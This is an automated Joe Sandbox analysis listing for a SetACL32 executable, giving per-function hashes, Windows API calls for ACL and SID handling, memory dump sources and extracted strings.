                • Instruction ID: fa6061cc4c6e83b239dd015863916540c41ec79d86f0e30c3f145ad55a8d9812
                • Opcode Fuzzy Hash: da15aaf098d3bf1ea6d7ba4770c2072ab3fceaa19f5f4405bfee0b70aa043d90
                • Instruction Fuzzy Hash: 7E61F4729183059FEF20EF75C841BAAB7F8EF45320F24406AE945EB295EB719D40EB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00FA0FA9
                • __fassign.LIBCMT ref: 00FA1188
                • __fassign.LIBCMT ref: 00FA11A5
                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FA11ED
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FA122D
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FA12D9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FileWrite__fassign$ConsoleErrorLast
                • String ID: @M)w
                • API String ID: 4031098158-1211491014
                • Opcode ID: 741640dab57f6d9e2f50ed93730891d6563dfa3dc0ccd31dda3b556e7ade9578
                • Instruction ID: 0dbb60bc3bc9c212f5576e52f36de9f669d9cd9ca82935bba88e200f40a26dc0
                • Opcode Fuzzy Hash: 741640dab57f6d9e2f50ed93730891d6563dfa3dc0ccd31dda3b556e7ade9578
                • Instruction Fuzzy Hash: C5D1CFB5D002989FCF15CFE8C880AEDBBB9BF4A314F294169E855FB241D730A945DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F88BB0: IsValidSid.ADVAPI32(00F89605,00000000,00000000,00000000,00000000,00000000,000000FF,?,00F89605,00000000,?,?), ref: 00F88BC8
                  • Part of subcall function 00F88BB0: GetLengthSid.ADVAPI32(00000000,00F89605,?,00F89605,00000000,?,?), ref: 00F88BD9
                • IsValidSid.ADVAPI32(04444444,04444444,?,?,00000000,00000000,?,?,?,00F898C1,?), ref: 00F89A51
                • IsValidSid.ADVAPI32(04444444,?,?,00F898C1,?,?,?,?,?,?,000000FF), ref: 00F89A63
                • EqualSid.ADVAPI32(04444444,04444444,?,?,00F898C1,?,?,?,?,?,?,000000FF), ref: 00F89A73
                Strings
                • invalid hash bucket count, xrefs: 00F89B5A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$EqualLength
                • String ID: invalid hash bucket count
                • API String ID: 2688289545-1101463472
                • Opcode ID: 48c9cc54e70855348009fd938d7a2398f475e1674b48fa6ac20462b5f3780a19
                • Instruction ID: 4463b21a8a107d32ba3a90e9450b9ece54e39cce3f0a8f98a5b02f72dc790905
                • Opcode Fuzzy Hash: 48c9cc54e70855348009fd938d7a2398f475e1674b48fa6ac20462b5f3780a19
                • Instruction Fuzzy Hash: D36102B4A04206DFCB14DF29C5809AAFBF8FF48310718C5A9E859DB715D7B0EA51EB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetAclInformation.ADVAPI32(00790073,00F7965F,0000000C,00000002,?), ref: 00F82AE7
                • GetLastError.KERNEL32 ref: 00F82AF1
                • GetAce.ADVAPI32(00790073,00000000,00000000), ref: 00F82B26
                • DeleteAce.ADVAPI32(00790073,00000000), ref: 00F82B52
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DeleteErrorInformationLast
                • String ID: @M)w
                • API String ID: 1701277466-1211491014
                • Opcode ID: cd9437f86e27a4c0565639d404a002190dc7af7a25f61611afa440040241ed03
                • Instruction ID: a807f868798871e6831410689566592af2c6a8ee31fa85a16d3fbb062770bfeb
                • Opcode Fuzzy Hash: cd9437f86e27a4c0565639d404a002190dc7af7a25f61611afa440040241ed03
                • Instruction Fuzzy Hash: 7741D331A0021C8BDB20EFA5E855BFEB7A8EF99320F10055FE80697241DB35AD10A790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetAclInformation.ADVAPI32(00790073,746D712B,0000000C,00000002,?,00000000,?,00000002), ref: 00F82989
                • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 00F82993
                • GetAce.ADVAPI32(00790073,00000000,00000000,?,00000000,?,00000002), ref: 00F829C6
                • DeleteAce.ADVAPI32(00790073,00000000,00000000,00000002,00000002,?,00000000,?,00000002), ref: 00F829EA
                • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 00F82A11
                • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 00F82A35
                  • Part of subcall function 00F7D640: GetAclInformation.ADVAPI32(00000000,00000000,0000000C,00000002,?,00000000,00000000,?,00F82F41), ref: 00F7D681
                  • Part of subcall function 00F7D640: GetAce.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000), ref: 00F7D6A8
                  • Part of subcall function 00F7D640: EqualSid.ADVAPI32(?,-00000008,?,00000000,00000000), ref: 00F7D6C1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$Information$DeleteEqual
                • String ID: @M)w
                • API String ID: 1411212394-1211491014
                • Opcode ID: 03c5dbd2a2f50d3df724fd38c93e367e15e004a33e9424b2cfd3b6ce76095052
                • Instruction ID: 771e9992653ead214fbc3d6b65a25cf76fd4e7c30d60431ba05e28590cf5d1de
                • Opcode Fuzzy Hash: 03c5dbd2a2f50d3df724fd38c93e367e15e004a33e9424b2cfd3b6ce76095052
                • Instruction Fuzzy Hash: 69417331A0021D9BCB50EFA9D855BEEB7B8FF48320F10456BE906E7241DB75A910FB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,00F8DEB3,00F8C567,00F8BBCC), ref: 00F8DECA
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F8DED8
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F8DEF1
                • SetLastError.KERNEL32(00000000,00F8DEB3,00F8C567,00F8BBCC), ref: 00F8DF43
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID: @M)w
                • API String ID: 3852720340-1211491014
                • Opcode ID: 575746b4bd1de0f210d0e43212e9ed14054de02b8e605c7319204d4666bd52a1
                • Instruction ID: c619c0da54833141b932e22b4378befed0cf33f8c5940543190caa9cec1eac35
                • Opcode Fuzzy Hash: 575746b4bd1de0f210d0e43212e9ed14054de02b8e605c7319204d4666bd52a1
                • Instruction Fuzzy Hash: D401D432A0D3169EAB2437747C8AEEA3794EF11375B200239F616461E1FF954C05B344
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,?), ref: 00F8A981
                • __alloca_probe_16.LIBCMT ref: 00F8A9AD
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00F8A9EC
                • LCMapStringEx.KERNEL32 ref: 00F8AA09
                • LCMapStringEx.KERNEL32 ref: 00F8AA48
                • __alloca_probe_16.LIBCMT ref: 00F8AA65
                • LCMapStringEx.KERNEL32 ref: 00F8AAA7
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F8AACA
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                • String ID:
                • API String ID: 2040435927-0
                • Opcode ID: 8a8ca65b1427037f326333b34066cb32d6adbeb23d789c35634c79668f751a71
                • Instruction ID: 08d2a2205c802310f22e6e7f342ac6450eefda028d89b858cc8cc58ec810e8fd
                • Opcode Fuzzy Hash: 8a8ca65b1427037f326333b34066cb32d6adbeb23d789c35634c79668f751a71
                • Instruction Fuzzy Hash: 9451E072A0021AEBFF24AF60CD40FEB3BA9EF44760F154426F914A6150E738CD10EB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F6301E
                • std::locale::_Init.LIBCPMT ref: 00F63145
                • std::locale::_Init.LIBCPMT ref: 00F63235
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
                • String ID: +qmt$\\?\$\\?\UNC\
                • API String ID: 1949052339-4042308094
                • Opcode ID: 7535bff05f7b92482e573b058465b2b6544531bcea162a4ae0ed46159d7ae0cf
                • Instruction ID: e672292775a1d09c920f4a169de07c15f29172daa9190bfc5e8c7b6e0c5e6904
                • Opcode Fuzzy Hash: 7535bff05f7b92482e573b058465b2b6544531bcea162a4ae0ed46159d7ae0cf
                • Instruction Fuzzy Hash: 9602E471E00148DFDF14DF68C8857EEBBB1AF45314F288128E805AB395DB759B88DB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F6BC98
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F6BCAD
                  • Part of subcall function 00F69780: EnterCriticalSection.KERNEL32 ref: 00F697B8
                  • Part of subcall function 00F69780: LeaveCriticalSection.KERNEL32(00FCB6D4,?,?), ref: 00F69880
                  • Part of subcall function 00F62720: FindResourceW.KERNEL32(00000000,00000001,00000010,746D712B,?,?), ref: 00F6277B
                  • Part of subcall function 00F62720: LoadResource.KERNEL32(00000000,00000000), ref: 00F62788
                  • Part of subcall function 00F62720: LockResource.KERNEL32(00000000), ref: 00F62795
                  • Part of subcall function 00F62720: FreeResource.KERNEL32(00000000), ref: 00F627EF
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$Resource$Enter$LeaveTime$CurrentErrorFileFindFreeLastLoadLockNameSystemThreadUser
                • String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
                • API String ID: 1494673426-2110037876
                • Opcode ID: c77d36d688c19f71a207329cfd7753989dc684a0ccb413992f3e3736423f2a67
                • Instruction ID: faf17b3cff0c48ebd4888ed1a8a72c2c7eea039c82f9fc50a098188166d660bf
                • Opcode Fuzzy Hash: c77d36d688c19f71a207329cfd7753989dc684a0ccb413992f3e3736423f2a67
                • Instruction Fuzzy Hash: DF020771A10248DBEF04DFA4CD89BDDBB72FF45304F20824CE444AB295D779AA84DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F75DB8
                • std::locale::_Init.LIBCPMT ref: 00F75E01
                • std::locale::_Init.LIBCPMT ref: 00F75E49
                • std::locale::_Init.LIBCPMT ref: 00F75F56
                • std::locale::_Init.LIBCPMT ref: 00F75FA5
                • std::locale::_Init.LIBCPMT ref: 00F75FED
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_
                • String ID: hkey_local_machine$hklm$machine
                • API String ID: 1620887387-1905530886
                • Opcode ID: f0b60d1f3fcbaafc0a49b484092a549469e7448747f507fd457e5a113ee6a9f0
                • Instruction ID: e9c1f204f5c1c7ac8bb4f6d727f9d0589671a8445940f34126d04810c63af528
                • Opcode Fuzzy Hash: f0b60d1f3fcbaafc0a49b484092a549469e7448747f507fd457e5a113ee6a9f0
                • Instruction Fuzzy Hash: 24E1F471E005188BEF18CB68CC85BDDB772AF84304F20C29AE509EB2D5DB759E85DB52
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F75DB8
                • std::locale::_Init.LIBCPMT ref: 00F75E01
                • std::locale::_Init.LIBCPMT ref: 00F75E49
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_
                • String ID: hkey_local_machine$hklm$machine
                • API String ID: 1620887387-1905530886
                • Opcode ID: d1394631150251aaef5b3959dde9f36df9406083a5d4ce22ce7154b8696a5c50
                • Instruction ID: d76e4bfa247d703231445227757cf4926ba18c080d708ee49e28bf64f5225a4c
                • Opcode Fuzzy Hash: d1394631150251aaef5b3959dde9f36df9406083a5d4ce22ce7154b8696a5c50
                • Instruction Fuzzy Hash: 32D11571E006189BEF14CFA4CC85BDDB772AF84304F20819AE509EB295DB75EE85DB42
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VerQueryValueW.VERSION(00000000,?,?,?,\VarFileInfo\Translation,00000018,746D712B,00000000,?,00000000), ref: 00F62906
                • GetUserDefaultLangID.KERNEL32(\StringFileInfo\%04X04B0\%s), ref: 00F62A09
                • VerQueryValueW.VERSION(00000000,?,?,?,?,?), ref: 00F62AA5
                  • Part of subcall function 00F586F0: std::locale::_Init.LIBCPMT ref: 00F587B8
                Strings
                • \StringFileInfo\%04X04B0\%s, xrefs: 00F629F3
                • \VarFileInfo\Translation, xrefs: 00F628BC
                • \StringFileInfo\%04x%04x\%s, xrefs: 00F62921
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: QueryValue$DefaultInitLangUserstd::locale::_
                • String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                • API String ID: 2791023842-1470331934
                • Opcode ID: 078801f569c928c89299e309a827f32515ae74f44c372c60932ca4784d4cf954
                • Instruction ID: 3ca11c6dd89a4496454936119284146f6c3cfdef36951da9076caf62d03da5a4
                • Opcode Fuzzy Hash: 078801f569c928c89299e309a827f32515ae74f44c372c60932ca4784d4cf954
                • Instruction Fuzzy Hash: 0F816A70A00249CFDB18DFA4C855BEEB7B5EF84304F008559E906B7281DB785A49EFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetComputerNameW.KERNEL32 ref: 00F62BA2
                • GetLastError.KERNEL32 ref: 00F62BB0
                  • Part of subcall function 00F688E0: GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$NameTime$ComputerCriticalCurrentEnterFileSectionSystemThreadUser
                • String ID: +qmt$@M)w$GetComputerNameAPIWrapper$Querying the computer name failed with:
                • API String ID: 2272594576-141549578
                • Opcode ID: f67ac538d3ea1343d5319bc8b780b146df2d527a05f5810fd89967e1f9ccc2f9
                • Instruction ID: 9bbdad57958eaa87edd834e11d2f195a29d27d639ad2ad50e240a8c7ee1aa1c0
                • Opcode Fuzzy Hash: f67ac538d3ea1343d5319bc8b780b146df2d527a05f5810fd89967e1f9ccc2f9
                • Instruction Fuzzy Hash: B551F971E006489FDB04DFA4CC85BEEB776FF85310F10861DE815AB295DB74AA84DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00F8C6D7
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00F8C6DF
                • _ValidateLocalCookies.LIBCMT ref: 00F8C768
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00F8C793
                • _ValidateLocalCookies.LIBCMT ref: 00F8C7E8
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 672023c5d4b6d5c1f773f4742997535e5ba13541373affdf90a0f166eaae6ce7
                • Instruction ID: d3cfa3bcb00f5c12359008986681f798e9f06eaa0f5751349290e1a5ac3813f4
                • Opcode Fuzzy Hash: 672023c5d4b6d5c1f773f4742997535e5ba13541373affdf90a0f166eaae6ce7
                • Instruction Fuzzy Hash: 9841A334E002199BCF10EF68CC85ADE7BB5EF46324F148165E8149B392D7359A05EFE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97B9F: _free.LIBCMT ref: 00F97BC4
                • _free.LIBCMT ref: 00F97EA1
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F97EAC
                • _free.LIBCMT ref: 00F97EB7
                • _free.LIBCMT ref: 00F97F0B
                • _free.LIBCMT ref: 00F97F16
                • _free.LIBCMT ref: 00F97F21
                • _free.LIBCMT ref: 00F97F2C
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: a2948cd45a09085361632f2f8d60afe16e586b543b1255bd1d48c816b59ba376
                • Instruction ID: 6775f02ee31f1bd3ee879290c77d7a7b247aea5ccc6c1712257d50087cd68bbf
                • Opcode Fuzzy Hash: a2948cd45a09085361632f2f8d60afe16e586b543b1255bd1d48c816b59ba376
                • Instruction Fuzzy Hash: 26117F72654F04AAFE30BFB0CC47FCB779C6F41754F400814B3A9A60AAEB28B515BA50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FreeLibrary.KERNEL32(00000000,?,?,?,00F8EFC3,?,?,00FCAE1C,00000000,?,00F8F0EE,00000004,InitializeCriticalSectionEx,00FB0108,00FB0110,00000000), ref: 00F8EF92
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: @M)w$api-ms-
                • API String ID: 3664257935-3985099169
                • Opcode ID: b69e867f8d759419152ab38c85aa20202d41ee7f85d915b1215e395d93144a85
                • Instruction ID: 2094f7ceb7fb4ef0393e1aaad41375f0be04c9e8be89560bec4ca9a1064cc04f
                • Opcode Fuzzy Hash: b69e867f8d759419152ab38c85aa20202d41ee7f85d915b1215e395d93144a85
                • Instruction Fuzzy Hash: 1F11C636E41625ABDF226B689C44BDE37A49F017B0F154121FA05E72C0D770ED00B7D5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?), ref: 00F7D7CF
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?), ref: 00F7D7E2
                • GetAce.ADVAPI32(?,00000000,00000000,?,?), ref: 00F7D808
                • IsWellKnownSid.ADVAPI32(-00000008,00000003,?,?), ref: 00F7D83A
                • GetAce.ADVAPI32(?,00000000,00000000,?,?), ref: 00F7D86B
                • EqualSid.ADVAPI32(-00000008,?,?,?), ref: 00F7D881
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Information$EqualKnownWell
                • String ID:
                • API String ID: 3987763275-0
                • Opcode ID: 420df23892dc9142a031e7b9e43182043bd1187417630522752e974c3a4e0f28
                • Instruction ID: 91700f7e04b9391086d24d8f2b90fa371c49fa83a1186c20025a24456a928a5b
                • Opcode Fuzzy Hash: 420df23892dc9142a031e7b9e43182043bd1187417630522752e974c3a4e0f28
                • Instruction Fuzzy Hash: 67518B71E002189BDF10CF64C955BEEBBF5AF09360F58805AE989A7281D735ED01EB62
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsValidSid.ADVAPI32(?,?), ref: 00F827B4
                • IsValidSid.ADVAPI32(?), ref: 00F827C3
